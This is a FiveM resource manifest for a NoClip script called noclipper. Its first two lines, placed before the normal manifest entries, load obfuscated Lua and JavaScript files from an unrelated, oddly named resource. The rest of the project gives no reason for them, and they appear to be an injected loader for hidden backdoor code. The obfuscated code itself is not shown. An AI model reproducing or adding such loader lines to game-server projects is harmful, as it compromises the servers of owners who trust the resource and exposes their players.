shared_script '@omgwtfcotojevolemrdkatajna/ai_module_fg-obfuscated.lua'
shared_script '@omgwtfcotojevolemrdkatajna/ai_module_fg-obfuscated.js'
fx_version 'cerulean'
game 'gta5'
lua54 'yes'
author 'MiiMii1205'
description 'A pleasant, simple and fast NoClip script for FiveM'
version '1.3.0'
repository 'https://github.com/MiiMii1205/noclipper'
client_script 'Scripts/noclip.lua'
server_script 'Scripts/snoclip.lua'
shared_script '@es_extended/imports.lua'
shared_script '@ox_lib/init.lua'
export 'ToggleNoClipMode'